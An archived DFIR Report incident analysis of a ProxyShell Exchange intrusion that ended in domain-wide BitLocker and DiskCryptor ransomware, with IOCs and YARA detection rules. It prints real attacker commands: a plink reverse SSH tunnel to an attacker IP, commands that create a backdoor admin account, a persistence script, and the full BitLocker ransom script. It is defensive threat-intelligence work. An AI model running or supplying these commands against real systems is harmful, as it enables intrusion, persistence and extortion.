{ "id": "7a145927-c29d-41b2-96a9-5a0933b30d69", "created_at": "2026-04-06T02:12:35.417063Z", "updated_at": "2026-04-10T03:34:00.387139Z", "deleted_at": null, "sha1_hash": "39a7c810ea0bbe87870f054ce243a272e263efaf", "title": "Exchange Exploit Leads to Domain Wide Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1292989, "plain_text": "Exchange Exploit Leads to Domain Wide Ransomware\r\nBy editor\r\nPublished: 2021-11-15 · Archived: 2026-04-06 01:31:44 UTC\r\nIn late September 2021, we observed an intrusion in which initial access was gained by the threat actor exploiting\r\nmultiple vulnerabilities in Microsoft Exchange. The threat actors in this case were attributed to a group Microsoft\r\ntracks as PHOSPHORUS (possible overlap with UNC2448, NemesisKitten, and DEV-0270) which is suspected to\r\nbe an Iranian nation state operator.\r\nProxyShell was used to deploy multiple web shells which lead to discovery actions, dumping of LSASS, use of\r\nPlink and Fast Reverse Proxy to proxy RDP connections into the environment. Furthermore, the actors encrypted\r\nsystems domain wide, using BitLocker on servers and DiskCryptor on workstations, rather than affiliating with\r\nRansomware as a Service (RaaS) programs or building an encryptor from scratch.\r\nProxyShell is a name given to a combination of three vulnerabilities: CVE-2021-34473, CVE-2021-34523, and\r\nCVE-2021-31207. An attacker chaining the exploitation of these vulnerabilities could execute arbitrary code with\r\nSYSTEM privileges on Exchange servers. Here’s some more information on ProxyShell : CISA Alert, NCSC\r\nAlert, Mandiant, Zero Day Initiative.\r\nThe threat actors conducted this intrusion with almost no malware. It was a rare occurrence of a ransomware\r\nattack where Cobalt Strike was not used or any other C2 framework.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly\r\npublished post-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit,\r\nSliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term\r\ntracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 1 of 27\n\nWe observed an intrusion where an adversary exploited multiple Exchange vulnerabilities (ProxyShell) to drop\r\nmultiple web shells. Over the course of three days, three different web shells were dropped in publicly accessible\r\ndirectories. These web shells, exposed to the internet, were used to execute arbitrary code on the Microsoft\r\nExchange Server utilizing PowerShell and cmd.\r\nAfter gaining an initial foothold on the Exchange system, the threat actors started discovery by executing\r\ncommands like ipconfig, net, ping, systeminfo, and others, using the previously dropped web shells. This battery\r\nof initial discovery included a network call out to themoscowtimes[.]com. The threat actors repeated these tests\r\ntwice over the first two days. On the third day, the next phase of the intrusion was underway.\r\nSince the commands executed via the web shell run with SYSTEM level privileges, threat actors took advantage\r\nof this and enabled a built-in account DefaultAccount, set the password and added it to Administrator and Remote\r\nDesktop Users groups. The threat actors then dropped Plink and established an SSH tunnel to expose RDP over\r\nthe tunnel. They then connected to the Exchange server over RDP using the DefaultAccount account.\r\nThey then copied their tools into the environment via RDP, which was observed when CacheTask.zip was copied\r\nto disk. This compressed file had a few files in it:\r\nCacheTask.bat\r\nCacheTask.xml\r\ndllhost.exe\r\ninstall-proxy.bat\r\nRuntimeBroker\r\nRight after the transfer, the adversaries executed install-proxy.bat to create two directories and move\r\nCacheTask.bat, dllhost.exe and RuntimeBroker into their respective folder. A scheduled task was created and\r\nexecuted, to execute install-proxy.bat, which established network persistence via Fast Reverse Proxy (FRP) which\r\nwas used to proxy RDP traffic during the intrusion.\r\nUtilizing the Plink RDP connection, the threat actor dumped LSASS using Task Manager. Thirty minutes later, the\r\nthreat actor started using a domain administrator account.\r\nUsing the stolen Domain Admin account, adversaries performed port scanning with KPortScan 3.0 and then\r\nmoved laterally using RDP. Targeted servers included backup systems and domain controllers. The threat actor\r\nalso deployed the FRP package to these systems after gaining access.\r\nFinally, the threat actors deployed setup.bat across the servers in the environment using RDP and then used an\r\nopen source disk encryption utility to encrypt the workstations. Setup.bat ran commands to enable BitLocker\r\nencryption, which resulted in the hosts being inoperable.\r\nTo encrypt workstations, an open source utility called DiskCryptor was utilized. This was dropped on the\r\nworkstations via RDP sessions and then executed to install the utility and setup the encryption. The utility required\r\na reboot to install a kernel mode driver and then another reboot to lock out access to the workstations.\r\nThe time to ransom (TTR) of this intrusion, from the first successful ProxyShell exploitation to ransom, was\r\naround 42 hours. If the blue team failed to detect the intrusion up until the DefaultAccount being enabled, they\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 2 of 27\n\nwould have had 8 hours to respond and evict the threat actors before being ransomed.\r\nThe threat actors left a ransom note requesting 8,000 USD to get the encryption keys for the systems.\r\nTimeline\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 3 of 27\n\nAnalysis and reporting completed by @0xtornado \u0026 @v3t0_\r\nReviewed by @samaritan_o \u0026 @svch0st\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 4 of 27\n\nMITRE ATT\u0026CK\r\nInitial Access\r\nThis time we will talk about ProxyShell, which revealed itself around August 2021. Once again, the vulnerability\r\naffects Microsoft Exchange servers. Specifically, the on-prem versions identified as Exchange Server 2013,\r\nExchange Server 2016 and Exchange Server 2019. It is interesting to note how the ProxyShell vulnerability,\r\noriginally identified and exploited by Orange Tsai (@orange_8361), includes a chain of 3 different CVEs:\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\nIn this specific scenario, we observed the presence and exploitation of all the CVEs indicated above so;\r\nspecifically, the attacker was able to exploit a Pre-auth Path Confusion Leads to ACL Bypass (CVE-2021-34473),\r\nan Elevation of Privilege on Exchange PowerShell Backend (CVE-2021-34523), and finally a Post-auth Arbitrary-File-Write Leads to RCE (CVE-2021-31207). This last CVE allowed the creation of multiple web shells. The\r\nmethod used by the actor in this incident was to first use the elevated PowerShell privileges to run the following\r\ndiscovery cmdlets:\r\nGet-MailboxRegionalConfiguration\r\nGet-Mailbox\r\nGet-ExchangeServer\r\nGet-InboxRule\r\nThis was shortly followed by the cmdlet “New-ManagementRoleAssignment” responsible for granting mailbox\r\nimport/export privileges before running “New-MailboxExportRequest”. The cmdlet would export a Mailbox to a\r\nprovided location with the .aspx extention. While the file is a legitimate .pst file, in contains plaintext web shell\r\ncode that is rendered by IIS when requested.\r\nBelow is an example of one of the IPs who successfully exploited the vulnerabilities:\r\nThree web shells were spotted during our investigation:\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 5 of 27\n\nThe login.aspx web shell is a simple web shell which takes a command and runs it using cmd.exe. We believe the\r\nthreat actor used aspx_qdajscizfzc.aspx to upload login.aspx and that’s why the parent process is w3wp. Here’s\r\nwhat the web shell looked like:\r\nThis is the web shell code for login.aspx:\r\nThe other two web shells were dropped upon the successful exploitation of ProxyShell. Running file command on\r\nthese two web shells, show that they are actually PST files that contain web shell:\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 6 of 27\n\n$ file *\r\naspx_gtonvbgidhh.aspx: Microsoft Outlook email folder (\u003e=2003)\r\naspx_qdajscizfzx.aspx: Microsoft Outlook email folder (\u003e=2003)\r\nThe first web shell, aspx_qdajscizfzx.apsx, can upload files and runs cmd.exe:\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 7 of 27\n\nThe second web shell, aspx_gtonvbgidhh.apsx, can upload files and runs powershell.exe:\r\nExecution\r\nThe threat actors executed a script named install-proxy.bat, containing the following lines of code:\r\n@echo off\r\ncd /D \"%~dp0\"\r\nmkdir C:\\ProgramData\\Microsoft\\Windows\\Runtime\\\r\nmkdir C:\\ProgramData\\Microsoft\\Windows\\DllHost\\\r\nmove /Y dllhost.exe C:\\ProgramData\\Microsoft\\Windows\\DllHost\\dllhost.exe\r\nmove /Y RuntimeBroker C:\\ProgramData\\Microsoft\\Windows\\Runtime\\RuntimeBroker\r\nmove /Y CacheTask.bat C:\\ProgramData\\Microsoft\\CacheTask.bat\r\nschtasks.exe /End /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\nschtasks.exe /Delete /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\nschtasks.exe /Create /F /XML CacheTask.xml /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\nschtasks.exe /Run /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\ndel /F CacheTask.xml\r\nstart /b \"\" cmd /c del \"%~f0\"\u0026exit /b\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 8 of 27\n\nThe script creates two directories, then moves files into their respective directories. It first stops and then deletes a\r\ntask named CacheTask if it exists. It then Creates a schedule task which will call an XML file which then executes\r\nCacheTask.bat\r\nCacheTask.bat is a script that loops the execution of the Fast Reverse Proxy (FRP) binary:\r\n:loop\r\nC:\\ProgramData\\Microsoft\\Windows\\DllHost\\dllhost.exe\r\ngoto loop\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 9 of 27\n\nBelow is a screenshot of dllhost.exe hash lookup in VirusTotal, matching Florian Roth’s Yara rule\r\nHKTL_PUA_FRP_FastReverseProxy_Oct21_1:\r\nThe C:\\ProgramData\\Microsoft\\Windows\\Runtime\\RuntimeBroker file is linked to the execution above, and\r\ncontained the following lines of code which are a configuration file for FRP:\r\n[common]\r\nlog_level = trace\r\nlogin_fail_exit = true\r\n[RedactedHOSTNAME.RedactedDOMAIN_RedactedIP]\r\ntype = tcp\r\nremote_port = 10151\r\nplugin = http_proxy\r\nuse_encryption = true\r\nuse_compression = true\r\nThe above configuration creates a http proxy bound to port 10151/tcp using encryption and compression.\r\nThe threat actors also dropped and executed plink.exe, creating a remote SSH tunnel to 148.251.71[.]182\r\n(tcp[.]symantecserver[.]co) in order to reach the RDP port on the Exchange system over the internet:\r\n\"powershell.exe\" /c echo y | plink.exe -N -T -R 0.0.0.0:1251:127.0.0.1:3389 148.251.71.182 -P 22 -l f\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 10 of 27\n\nIn the command line above you can see several options being used:\r\n-N : To avoid starting the shell\r\n-T : To avoid the allocation of a pseudo-terminal\r\n-R : Forward remote port to local address\r\n-P 22 : Port number\r\n-l forward : Login name\r\n-pw Socks@123 : Login password\r\n-no-antispoof : To omit anti-spoofing prompt after authentication\r\nAfter running the above Plink command, the threat actors had RDP access into the environment over the SSH\r\ntunnel.\r\nPersistence\r\nValid Accounts\r\nTo maintain persistence on patient 0, the threat actors leveraged the built-in DefaultAccount. It is a user-neutral\r\naccount that can be used to run processes that are either multi-user aware or user-agnostic. The DSMA is disabled\r\nby default on the desktop SKUs (full windows SKUs) and WS 2016 with the Desktop (Reference).\r\nTo achieve persistence, the threat actors enabled the DefaultAccount by running the following command, using a\r\nweb shell:\r\n\"powershell.exe\" /c net user DefaultAccount /active:yes\r\nAfter activating the account, the threat actors set the password of this account to P@ssw0rd and added it to\r\nAdministrators and Remote Desktop Users groups.\r\n\"powershell.exe\" /c net user DefaultAccount P@ssw0rd\r\n\"powershell.exe\" /c net localgroup \"Remote Desktop Users\" /Add DefaultAccount\r\n\"powershell.exe\" /c net localgroup Administrators /Add DefaultAccount\r\nPrivilege Escalation\r\nProxyShell exploitation provided the threat actors with NT AUTHORITY\\SYSTEM privileges. Those privileges\r\nallowed them to enable the DefaultAdmin account to get access to the Mail Server using valid credentials.\r\nMoreover, the threat actors managed to dump LSASS and steal a domain administrator account, which was used\r\nto perform lateral movement.\r\nDefense Evasion\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 11 of 27\n\nAdvanced defense evasion techniques, such as impairing defenses or process injections, were not used during this\r\nintrusion. However, the threat actors performed masquerading with many of their tools:\r\nThey created login.aspx web shell in the same folder as the legitimate OWA login page.\r\nThey renamed Fast Reverse Proxy to dllhost.exe to remain stealthy\r\nThey created the Scheduled Task with “\\Microsoft\\Windows\\Maintenance\\CacheTask” name to stay un-noticed\r\nCredential Access\r\nLSASS Dump\r\nThe threat actors dumped LSASS process manually using the Task Manager CAR-2019-08-001:\r\nFile created:\r\nRuleName: -\r\nUtcTime: REDACTED 10:40:24.958\r\nProcessGuid: {BF388D9C-AB02-614D-B552-000000000700}\r\nProcessId: 17480\r\nImage: C:\\Windows\\system32\\taskmgr.exe\r\nTargetFilename: C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\2\\lsass.DMP\r\nTo facilitate the LSASS dump exfiltration, the threat actors created a zip archive named lsass.zip:\r\nFile created:\r\nRuleName: -\r\nUtcTime: REDACTED 10:40:48.698\r\nProcessGuid: {BF388D9C-AADF-614D-A052-000000000700}\r\nProcessId: 17412\r\nImage: C:\\Windows\\Explorer.EXE\r\nTargetFilename: C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\2\\lsass.zip\r\nDiscovery\r\nEnvironment Discovery\r\nAs previously mentioned, we saw multiple cmdlets related to exchange:\r\nGet-MailboxRegionalConfiguration\r\nGet-Mailbox\r\nGet-ExchangeServer\r\nGet-InboxRule\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 12 of 27\n\nUsing the dropped web shells, the threat actors performed the following commands:\r\nPort Scanning\r\nThe threat actors used KPortScan 3.0, a widely used port scanning tool on Hacking Forums, to perform network\r\nscanning on the internal network:\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 13 of 27\n\nLateral Movement\r\nThe threat actors mainly used Remote Desktop Services (RDP) to move laterally to other servers using the stolen\r\ndomain admin account. Below is an extract focusing on RDP activity from patient 0:\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 14 of 27\n\nThe threat actors also appeared to use Impacket’s wmiexec to perform lateral movement on one of the domain\r\ncontrollers.\r\nWe do not have a clear explanation for that behavior. However, we strongly believe that this was related to the\r\ndeployment of the encryption script, as it happened just a few minutes before its manual execution on servers.\r\nCollection\r\nNo data collection was observed in this intrusion. The threat actors only collected the dumped LSASS using a zip\r\narchive:\r\nFile created:\r\nRuleName: -\r\nUtcTime: REDACTED 10:40:48.698\r\nProcessGuid: {BF388D9C-AADF-614D-A052-000000000700}\r\nProcessId: 17412\r\nImage: C:\\Windows\\Explorer.EXE\r\nTargetFilename: C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\2\\lsass.zip\r\nCreationUtcTime: REDACTED 10:40:48.697\r\nCommand and Control\r\nNo Command and Control frameworks were used during this intrusion. Initial access to the environment was\r\nperformed using the web shell upon the exploitation of ProxyShell, then using valid accounts and Remote Desktop\r\nServices.\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 15 of 27\n\nThreat actors created a SSH tunnel to 148.251.71[.]182 using plink in order to forward RDP access:\r\nLooking at this IP address on VirusTotal, we can observe that all “Communicating Files” related to it trigger FRP\r\nAV Signatures or Yara rules:\r\nWe can conclude that those threat actors are used to this protocol tunneling technique.\r\nExfiltration\r\nExcept lsass.zip, no data exfiltration or staging have been observed during this intrusion.\r\nImpact\r\nIn this intrusion the threat actors used BitLocker and an open source encrypter, DiskCryptor, in order to encrypt\r\nsystems domain wide. On servers a batch script named setup.bat was used and on workstations the GUI\r\napplication named dcrypt.exe(DiskCryptor) was executed instead. Both were executed via the threat actors after\r\nRDP login to each host.\r\nOn servers they copied over a file named setup.bat.\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 16 of 27\n\nThey then manually executed the script which disables the event log service, enables BitLocker (and RDP),\r\nprepares system drive using BdeHdCfg (a BitLocker drive encryption preparation tool), restarts the system, and\r\ndeletes itself.\r\nBelow are the commands executed by the script:\r\nnet stop eventlog /y\r\nsc config TermService start= auto\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t RE\r\nnetsh advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\r\nnet start TermService\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 17 of 27\n\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPM /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMKey /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /V RecoveryKeyMessageSource /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v RecoveryKeyMessage /t REG_SZ /d \" +-+-+- Your drives are Encryp\r\npowershell -c \"Import-Module ServerManager; ADD-WindowsFeature BitLocker -Restart\"\r\npowershell -c \"Install-WindowsFeature BitLocker ΓÇôIncludeAllSubFeature -IncludeManagementTools -Restart\"\r\npowershell -c \"Initialize-Tpm -AllowClear -AllowPhysicalPresence -ErrorAction SilentlyContinue\"\r\npowershell -c \"Get-Service -Name defragsvc -ErrorAction SilentlyContinue | Set-Service -Status Running -ErrorAc\r\npowershell -c \"BdeHdCfg -target $env:SystemDrive shrink -quiet -restart\"\r\nsc config eventlog start= auto\r\ncmd /c del \"C:\\Windows\\setup.bat\"\r\ncmd /c del \"C:\\Users\\REDACTED\\Desktop\\setup.bat\"\r\nRunning this script on servers made them inaccessible, and the following BitLocker encryption message was\r\nshown when restarted:\r\nA binary called dcrypt.exe, was dropped on a backup server and immediately deleted. While this utility was not\r\nexecuted on any servers in the environment it was deployed to all the workstations.\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 18 of 27\n\nThe executable used is the current release of the installer for the utility DiskCryptor.\r\nWe are unsure why DiskCrypter was used on workstations but we believe it may have something to do with not all\r\nworkstation versions supporting BitLocker.\r\nhttps://en.wikipedia.org/wiki/BitLocker\r\nUse of this utility on workstations ensures a reliable encryption without the need to develop their own ransomware\r\nor get into a ransomware as a service affiliate program.\r\nThis executable, however, reminds you on install that it is “beta” software.\r\nThe setup process then works as most windows installers and requires a reboot of the system. During installation a\r\nkernel mode driver is added to support the encryption process.\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 19 of 27\n\nAfter reboot, the program GUI allows you to configure the encryption options.\r\nAfter encryption completed, the systems were rebooted and left with the following screen:\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 20 of 27\n\nThe threat actors left their note requesting 8,000 USD on a domain controller which was not rebooted or locked\r\nout. The note pointed to Telegram and ProtonMail contacts\r\nIOCs\r\nAll artifacts including web shells, files, IPs, etc were added to our servers in September.\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 21 of 27\n\nNetwork\r\nPlink\r\n148.251.71.182\r\ntcp.symantecserver.co\r\ndllhost.exe connected to the following IPs over 443\r\n18.221.115.241\r\n217.23.5.42\r\n37.139.3.208\r\n148.251.71.182\r\nConnected to aspx_gtonvbgidhh.aspx\r\n198.144.189.74\r\n86.57.38.156\r\nFile\r\n- dcrypt.exe\r\n - md5: 3375fe67827671e121d049f9aabefc3e\r\n - SHA1: e5286dbd0a54a110b39eb1e3e7015d82f316132e\r\n - SHA256: 02ac3a4f1cfb2723c20f3c7678b62c340c7974b95f8d9320941641d5c6fd2fee\r\n- dllhost.exe\r\n - md5: d4a55e486f5e28168bc4554cffa64ea0\r\n - SHA1: 49c222afbe9c610fa75ffbbfb454728e608c8b57\r\n - SHA256: e3eac25c3beb77ffed609c53b447a81ec8a0e20fb94a6442a51d72ca9e6f7cd2\r\n- login.aspx\r\n - md5: 7c2b567b659246d2b278da500daa9abe\r\n - SHA1: 83d21bb502b73016ec0ad7d6c725d71aaffa0f6d\r\n - SHA256: 98ccde0e1a5e6c7071623b8b294df53d8e750ff2fa22070b19a88faeaa3d32b0\r\n- aspx_gtonvbgidhh.aspx\r\n - md5: 34623dc70d274157dbc6e08b21154a3f\r\n - SHA1: 3664e6e27fb2784f44f6dba6105ac8b90793032a\r\n - SHA256: dc4186dd9b3a4af8565f87a9a799644fce8af25e3ee8777d90ae660d48497a04\r\n- aspx_qdajscizfzx.aspx\r\n - md5: 31f05b4ee52f0512c96d0cc6f158e083\r\n - SHA1: ef949770ae46bb58918b0fe127bec0ec300b18a9\r\n - SHA256: 60d22223625c86d7f3deb20f41aec40bc8e1df3ab02cf379d95554df05edf55c\r\nDetections\r\nNetwork\r\nET INFO User-Agent (python-requests) Inbound to Webserver\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 22 of 27\n\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nalert tcp [$HOME_NET,$HTTP_SERVERS] any -\u003e any any (msg:\"ET EXPLOIT Vulnerable Microsoft Exchange Se\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Microsoft Exchange SUID Dis\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nalert tcp [$HOME_NET,$HTTP_SERVERS] any -\u003e any any (msg:\"ET EXPLOIT Vulnerable Microsoft Exchange Se\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Microsoft Exchange SUID Dis\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nSigma\r\nScheduled Task Creation\r\nWebshell Detection With Command Line Keywords\r\nSystem File Execution Location Anomaly\r\nFile Created with System Process Name\r\nExfiltration and Tunneling Tools Execution\r\nSuspicious Plink Remote Forwarding\r\nImpacket Lateralization Detection\r\nLSASS Memory Dump File Creation\r\nYara\r\nValhalla/Loki Yara Sigs\r\nWEBSHELL_ASPX_ProxyShell_Aug21_2\r\nWEBSHELL_ASPX_ProxyShell_Aug21_2\r\nSUSP_ASPX_PossibleDropperArtifact_Aug21\r\nSUSP_ASPX_PossibleDropperArtifact_Aug21\r\n/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2021-11-14\r\n Identifier: 6898\r\n Reference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 23 of 27\n\nimport \"pe\"\nrule sig_6898_login_webshell {\n meta:\n description = \"6898 - file login.aspx\"\n author = \"The DFIR Report\"\n reference = \"https://thedfirreport.com/\"\n date = \"2021-11-14\"\n hash1 = \"98ccde0e1a5e6c7071623b8b294df53d8e750ff2fa22070b19a88faeaa3d32b0\"\n strings:\n $s1 = \"c:\\\\windows\\\\system32\\\\cmd.exe $s2 = \"myProcessStartInfo.UseShellExecute = false \" fullword ascii\n $s3 = \"\\\"Microsoft.Exchange.ServiceHost.exe0r\" fullword ascii\n $s4 = \"myProcessStartInfo.Arguments=xcmd.text \" fullword ascii\n $s5 = \"myProcess.StartInfo = myProcessStartInfo \" fullword ascii\n $s6 = \"myProcess.Start() \" fullword ascii\n $s7 = \"myProcessStartInfo.RedirectStandardOutput = true \" fullword ascii\n $s8 = \"myProcess.Close() \" fullword ascii\n $s9 = \"Dim myStreamReader As StreamReader = myProcess.StandardOutput \" fullword ascii\n $s10 = \"\u003c%@ import Namespace='system.IO' %\u003e\" fullword ascii\n $s11 = \"\u003c%@ import Namespace='System.Diagnostics' %\u003e\" fullword ascii\n $s12 = \"Dim myProcess As New Process() \" fullword ascii\n $s13 = \"Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) \" fullword ascii\n $s14 = \"example.org0\" fullword ascii\n $s16 = \"\n\n$s6 = \"return httpPostedFile.FileName + \\\" Uploaded to: \\\" + dstFile;\" fullword ascii\r\n $s7 = \"httpPostedFile.InputStream.Read(buffer, 0, fileLength);\" fullword ascii\r\n $s8 = \"int fileLength = httpPostedFile.ContentLength;\" fullword ascii\r\n $s9 = \"result = result + Environment.NewLine + \\\"ERROR:\\\" + Environment.NewLine + error;\" fullword ascii\r\n $s10 = \"ALAAAAAAAAAAA\" fullword ascii /* base64 encoded string ',' */\r\n $s11 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64\r\n $s12 = \"var result = delimiter + this.RunIt(Request.Params[\\\"exec_code\\\"]) + delimiter;\" fullword ascii\r\n $s13 = \"AAAAAAAAAAAAAAAAAAAAAAAA6AAAAAAAAAAAAAAA\" ascii /* base64 encoded string ':' */\r\n $s14 = \"using (StreamReader streamReader = process.StandardOutput)\" fullword ascii\r\n $s15 = \"private string RunIt(string command)\" fullword ascii\r\n $s16 = \"Process process = Process.Start(info);\" fullword ascii\r\n $s17 = \"ProcessStartInfo info = new ProcessStartInfo();\" fullword ascii\r\n $s18 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6\" ascii /* base64 encoded string ':' */\r\n $s19 = \"6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64 encoded string\r\n $s20 = \"if (Request.Params[\\\"exec_code\\\"] == \\\"put\\\")\" fullword ascii\r\n condition:\r\n uint16(0) == 0x4221 and filesize \u003c 800KB and\r\n 8 of them\r\n}\r\nrule aspx_qdajscizfzx_webshell {\r\n meta:\r\n description = \"6898 - file aspx_qdajscizfzx.aspx\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-14\"\r\n hash1 = \"60d22223625c86d7f3deb20f41aec40bc8e1df3ab02cf379d95554df05edf55c\"\r\n strings:\r\n $s1 = \"info.FileName = \\\"cmd.exe\\\";\" fullword ascii\r\n $s2 = \"info.UseShellExecute = false;\" fullword ascii\r\n $s3 = \"info.Arguments = \\\"/c \\\" + command;\" fullword ascii\r\n $s4 = \"var dstFile = Path.Combine(dstDir, Path.GetFileName(httpPostedFile.FileName));\" fullword ascii\r\n $s5 = \"using (StreamReader streamReader = process.StandardError)\" fullword ascii\r\n $s6 = \"return httpPostedFile.FileName + \\\" Uploaded to: \\\" + dstFile;\" fullword ascii\r\n $s7 = \"httpPostedFile.InputStream.Read(buffer, 0, fileLength);\" fullword ascii\r\n $s8 = \"int fileLength = httpPostedFile.ContentLength;\" fullword ascii\r\n $s9 = \"result = result + Environment.NewLine + \\\"ERROR:\\\" + Environment.NewLine + error;\" fullword ascii\r\n $s10 = \"ALAAAAAAAAAAA\" fullword ascii /* base64 encoded string ',' */\r\n $s11 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64\r\n $s12 = 